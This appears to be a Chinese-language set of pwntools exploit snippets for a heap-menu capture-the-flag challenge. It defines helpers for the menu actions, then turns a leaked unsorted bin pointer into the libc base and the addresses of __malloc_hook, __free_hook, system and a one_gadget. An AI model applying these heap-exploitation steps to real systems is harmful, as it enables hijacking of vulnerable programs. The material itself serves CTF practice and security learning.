利用代码片段
交互函数
def add(size):
io.recvuntil('>')
io.send('1')
io.recvuntil('size?')
io.send(str(size))
def edit(ticket, size, content):
io.recvuntil('>')
io.send('2')
io.recvuntil('index?')
io.send(str(ticket))
io.recvuntil('size?')
io.send(str(size))
io.send(content)
def dele(ticket):
io.recvuntil('>')
io.send('4')
io.recvuntil('index?')
io.send(str(ticket))
def show(ticket):
io.recvuntil('>')
io.sendline('3')
io.recvuntil('index?')
io.sendline(str(ticket))
计算地址
- 接收泄露的 unsorted bin 地址
unsorted_bins_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
log.success('unsorted_bins_addr -> ' + hex(unsorted_bins_addr))
- 计算 libc 基址
main_area_addr = unsorted_bins_addr - 0x58
libc_base = main_area_addr - 0x3c4b20
log.success('main_area_addr -> ' + hex(main_area_addr))
log.success('libc_base -> ' + hex(libc_base))
- 计算 malloc hook 地址
malloc_hook = libc_base + libc.sym['__malloc_hook']
log.success('malloc_hook -> ' + hex(malloc_hook))
- 计算 free hook 的地址
free_hook = libc_base + libc.sym['__free_hook']
log.success('free_hook -> ' + hex(free_hook))
- 计算 system 函数地址
system_addr = libc_base + libc.sym['system']
log.success('system_addr -> ' + hex(system_addr))
- 计算 one gadget 地址
one_gadget_list = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = libc_base + one_gadget_list[1]
log.success('one_gadget -> ' + hex(one_gadget))